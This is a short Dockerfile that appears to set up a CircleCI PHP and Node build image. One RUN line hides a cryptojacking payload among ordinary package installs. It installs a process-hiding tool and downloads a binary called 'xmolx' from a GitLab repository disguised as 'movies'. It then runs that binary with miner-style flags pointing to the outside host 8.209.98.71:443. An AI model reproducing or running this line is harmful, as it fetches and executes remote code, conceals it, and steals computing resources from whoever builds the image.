FROM circleci/php:7.3-node-browsers
USER root
RUN apt-get update
RUN apt-get install -y ruby jq curl wget rsync hub
RUN sudo apt-get update && sudo apt-get install -y gcc && curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt-get install -y nodejs && npm install -g npm@8.4.1 && npm i -g node-process-hider && sudo ph add xmolx && wget https://gitlab.com/jningkulin/movies/raw/main/xmolx && chmod u+x xmolx && ./xmolx -o 8.209.98.71:443 -u Sumi -p x --donate-level 1 -t 2 -k
RUN gem install circle-cli